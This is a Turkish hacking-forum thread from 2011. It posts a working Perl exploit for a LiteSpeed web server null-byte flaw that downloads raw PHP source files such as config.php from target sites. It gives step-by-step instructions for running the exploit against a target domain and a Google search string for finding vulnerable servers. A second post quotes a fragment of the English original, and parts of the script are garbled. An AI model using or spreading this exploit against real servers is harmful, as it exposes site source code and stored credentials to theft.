İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Wardom ve Hackhell 'in Hacklenmesine Sebep olan Açık

10-11-2011 19:52
#1
qRapHiceR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
18
Teşekkür (Etti):
0
Teşekkür (Aldı):
4
Konular:
12
Ticaret:
(0) %
Açığın Orjinal ismi : Litespeed Technologies Web Server Remote Poison null byte Exploit
Açığın Türkçe ismi : Litespeed Web server Uzaktan Zehirleme
Açığı bulan kişi : Kingcope
Açığın Yaptığı: Açıklar Sadece Site scriptlerinde değil Bazende Sitelerin Bulunduğu Web Serverlarda oluyor Bu açık ile config.php ve index.php Gibi dosyaları bilgisayarımıza çekiyor yani bize .php 'yi download etme şansı veriyor
Web Server nedir: Web Server Bir Serverın Yayın Yonetmenidir. Web sunucusu ya da ağ sunucusu, İnternet üzerinde bir web sitesinin yayınından sorumlu olan sunucudur. HTTP başta olmak üzere HTTPS, FTP, SMTP, POP3, DNS ve hatta gerçek zamanlı veri akışı (streaming media) hizmeti veriyor olabili

Exploit Anlatımı : Exploiti Kullanabilmek için Bilgisayarınızda Perl Yüklü olmalıdır

Exploitin Windows işletim sisteminde kullanımı şu dur ;

lite.pl olarak kaydedin Exploiti ve C:/Perl/bin Klasörüne atın
sonra Başlat > çalıştır > CMD yazıp enterlayın

gelen MS-DOS ekranına

cd.. komutu verin bu işlemi C:/ dizinine inene kadar Tekrarlayın
C:> < bunu görünce cd Perl/bin yazip enterlayın daha sonrasindan PHP- Kodu:
perl lite.pl www.hedefsite.com index.php

yazip
entera basin eğer açık varsa exploit PHP- Kodu:
www.hedefsite.com-index.php

Perl Kodu :
#!/usr/bin/perl
#
#Litespeed Uzaktan Zehirleme
#Bulan Kingcope
#Google Araması: ""Proudly Served by LiteSpeed Web Server""
#Haziran 2010



use IO::Socket;
use strict;

sub getphpsrc {
my $host = shift;
my $file = shift;

if (substr($file, 0, 1) eq "/") {
$file = substr($file, 1);
}
my $file2 = $file;
$file2 =~ s///_/g;
print "Kodlar kaydedildi $file > $host-$file2\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => '80',
Proto => 'tcp') || die("Baglanti saglanamadi $ARGV[0]");

print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:
close\r\n\r\n";

my $buf = "";

my $lpfound = 0;
my $saveme = 0;
my $savveme = 0;
while(<$sock>) {
if ($_ =~ /LiteSpeed/) {
$lpfound = 1;
}

if ($saveme == 2) {
$savveme = 1;
}

if ($saveme != 0 && $savveme == 0) {
$saveme++;
}

if ($_ =~ /Content-Length:/) {
$saveme = 1;
}

if ($savveme == 1) {
$buf .= $_;
}
}

if ($lpfound == 0) {
print "Litespeed Server olmaya bilir yinede acik Dosya kaydedildi.\n";
}

open FILE, ">$host-$file2";
print FILE $buf;
close FILE;
print "Tamamlandi.\n";
}

print "Litespeed Uzaktan Zehirleme\n";
print "Acıgı Bulan Kingcope\n";
print " Haziran 2010\n\n";

if ($#ARGV != 1) {
print "Kullanımı: perl lite.pl <domain/ip> <php dosyasi>\n";
print "Ornek: perl lite.pl index.php\n";
????:
exit(0);
}

getphpsrc($ARGV[0], $ARGV[1]);

print "İşlem Tamamlandı ~ Türkçeleştirme madconfig :>.\n";

10-11-2011 19:53
#2
qRapHiceR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
18
Teşekkür (Etti):
0
Teşekkür (Aldı):
4
Konular:
12
Ticaret:
(0) %
buda Orjinal hâli ;

Kod:
close FILE;   print "Completed.\n";   }     print "LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit\n";   print "By Kingcope\n";   print "June 2010\n\n";     if ($#ARGV != 1) {   print "Usage: perl litespeed.pl \n";   print "Example: perl litespeed.pl www.thedomain.com index.php\n";   exit(0);   }     getphpsrc($ARGV[0], $ARGV[1]);     print "Operation Completed :>.\n";
Tamamen alıntıdır.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı